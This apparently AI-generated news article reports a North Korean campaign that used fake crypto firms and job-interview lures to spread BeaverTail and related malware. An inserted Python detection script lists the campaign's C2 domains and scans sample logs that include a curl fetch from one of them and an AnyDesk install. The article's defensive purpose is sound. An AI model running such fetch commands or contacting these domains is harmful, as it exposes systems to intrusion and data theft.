Ethical Hacking News
In a recent campaign, North Korean hackers have been using fake job postings and cryptocurrency firms to distribute malware. The Contagious Interview campaign involves the use of artificial intelligence-powered tools to optimize every step in the process of applying and interviewing for roles. This article provides an in-depth analysis of the campaign and its implications for cybersecurity professionals.
North Korea has been linked to a malicious campaign using AI-powered tools to steal sensitive data and spread malware. The campaign, called Contagious Interview, uses front companies in the cryptocurrency consulting industry to distribute malware via job interview lures. The threat actors set up three front companies, BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, to spread malware. The malware families include BeaverTail, InvisibleFerret, and OtterCookie, which can harvest system information, launch reverse shells, and steal browser data. The threat actors use AI-powered tools like Remaker to create fake profile pictures for recruitment drives. The campaign has led to at least one developer getting their MetaMask wallet compromised in September 2024. The BlockNovas domain has since been seized by the FBI as part of a law enforcement action against the North Korean cyber actors who used it for malicious activities.
North Korea, a country notorious for its alleged involvement in various cybercrimes, has recently been linked to a malicious campaign designed to steal sensitive data and spread malware. The Contagious Interview campaign, as it is known, involves the use of artificial intelligence (AI)-powered tools to optimize every step in the process of applying and interviewing for roles, thereby facilitating the distribution of malware.
The campaign, which has been tracked by the broader cybersecurity community under various monikers such as CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, UNC5342, and Void Dokkaebi, involves the use of front companies in the cryptocurrency consulting industry to spread malware via 'job interview lures.' The threat actors, who are believed to be operating from China, Russia, and Pakistan, have set up three front companies, namely BlockNovas LLC, Angeloper Agency, and SoftGlide LLC, to distribute malware.
The malware families being distributed by the threat actors include BeaverTail, InvisibleFerret, and OtterCookie. The BeaverTail malware is configured to contact an external server ("lianxinxiao[.]com") for command-and-control (C2) and to serve InvisibleFerret as the follow-up payload. It comes with features to harvest system information, launch a reverse shell, download additional modules that steal browser data and files, and initiate the installation of the AnyDesk remote access software.
The use of front companies for malware propagation complements the setup of fraudulent accounts on social media platforms such as Facebook, LinkedIn, Pinterest, X, Medium, GitHub, and GitLab. This marks a new escalation for the threat actors, who have been observed using various job boards to lure victims into downloading cross-platform malware under the pretext of a coding assignment or of fixing an issue with their browser when turning on the camera during a video assessment.
The Contagious Interview campaign also involves the use of AI-powered tools such as Remaker to create profile pictures for the fake recruitment drives. The malicious activity has led to at least one developer getting their MetaMask wallet allegedly compromised in September 2024.
Furthermore, the threat actors have been observed hosting a tool named Kryptoneer on the domain attisscmo[.]com that offers the ability to connect to cryptocurrency wallets such as Suiet Wallet, Ethos Wallet, and Sui Wallet. The use of this domain has led some researchers to speculate that North Korean threat actors may be targeting the Sui blockchain or using it as an example of a 'crypto project' being worked on.
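The indicators quoted above (the BeaverTail C2 domain, the Kryptoneer hosting domain, the BlockNovas domain, and the AnyDesk install that BeaverTail triggers) can be turned into a small host-level detection. The script below is an added example, not code from the article or from the researchers it cites; the log format, host names, and the file path in the curl line are all assumed and the sample telemetry is constructed.

```python
import re

# Domains quoted in the article, kept in their defanged form.
DEFANGED_DOMAINS = ["lianxinxiao[.]com", "attisscmo[.]com", "blocknovas[.]com"]

def refang(indicator: str) -> str:
    """Turn 'example[.]com' back into 'example.com' so it matches raw telemetry."""
    return indicator.replace("[.]", ".").lower()

C2_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

# Constructed sample telemetry in an assumed format (not from the article):
# "dns" lines carry host and queried name, "proc" lines host and command line.
SAMPLE_LOGS = """\
dns host=dev-laptop-07 qname=api.github.com
dns host=dev-laptop-07 qname=lianxinxiao.com
proc host=dev-laptop-07 cmd="node /tmp/assignment/server.js"
proc host=dev-laptop-07 cmd="C:\\Users\\dev\\Downloads\\AnyDesk.exe --install"
dns host=build-02 qname=registry.npmjs.org
proc host=build-02 cmd="curl -s https://attisscmo.com/kryptoneer.js"
"""

DNS_RE = re.compile(r"^dns host=(\S+) qname=(\S+)$")
PROC_RE = re.compile(r'^proc host=(\S+) cmd="(.*)"$')

def find_alerts(log_text: str) -> list[tuple[str, str, str]]:
    """Return (host, rule, evidence) for each line touching a campaign indicator."""
    alerts = []
    for line in log_text.splitlines():
        if m := DNS_RE.match(line):
            host, qname = m.groups()
            if qname.lower().rstrip(".") in C2_DOMAINS:
                alerts.append((host, "c2-domain-lookup", qname))
        elif m := PROC_RE.match(line):
            host, cmd = m.groups()
            low = cmd.lower()
            # AnyDesk is legitimate; tune this against hosts that are allowed to run it.
            if "anydesk" in low:
                alerts.append((host, "anydesk-install", cmd))
            elif any(d in low for d in C2_DOMAINS):
                alerts.append((host, "c2-domain-in-cmdline", cmd))
    return alerts

def triage(alerts: list[tuple[str, str, str]]) -> dict[str, set[str]]:
    """Group fired rules per host: a host showing both the C2 lookup and the
    AnyDesk install matches the full BeaverTail chain and is isolated first."""
    by_host: dict[str, set[str]] = {}
    for host, rule, _ in alerts:
        by_host.setdefault(host, set()).add(rule)
    return by_host
```

Domain-name matching alone is brittle once the actors rotate infrastructure, so the per-host correlation in `triage` (C2 lookup followed by a remote-access tool install) is the part worth keeping as a behavioural rule.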
The BlockNovas front company lists 14 people as working for it; however, many of the employee personas appear to be fake. The 'About Us' page of blocknovas[.]com, as archived by the Wayback Machine, claimed the company had been operating for '12+ years', which is 11 years longer than the business has been registered.
In December 2024, BlockNovas advertised an open position for a senior software engineer on LinkedIn, specifically targeting Ukrainian IT professionals. However, as of April 23, 2025, the BlockNovas domain has been seized by the U.S. Federal Bureau of Investigation (FBI) as part of a law enforcement action against North Korean cyber actors for using it to "deceive individuals with fake job postings and distribute malware."
Researchers have identified five Russian IP ranges used to carry out the operation. These addresses are obscured behind a large anonymization network built from commercial VPN services, proxy servers, and numerous VPS servers accessed over RDP.
The discovery of this campaign highlights the evolving tactics, techniques, and procedures (TTPs) being employed by North Korean threat actors to spread malware. The use of AI-powered tools and front companies marks a new level of sophistication in their malicious activities, making it essential for cybersecurity professionals to stay vigilant and adapt their strategies accordingly.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Spread-Malware-via-Fake-Crypto-Firms-and-Job-Interview-Lures-ehn.shtml
Published: Fri Apr 25 11:14:40 2025 by llama3.2 3B Q4_K_M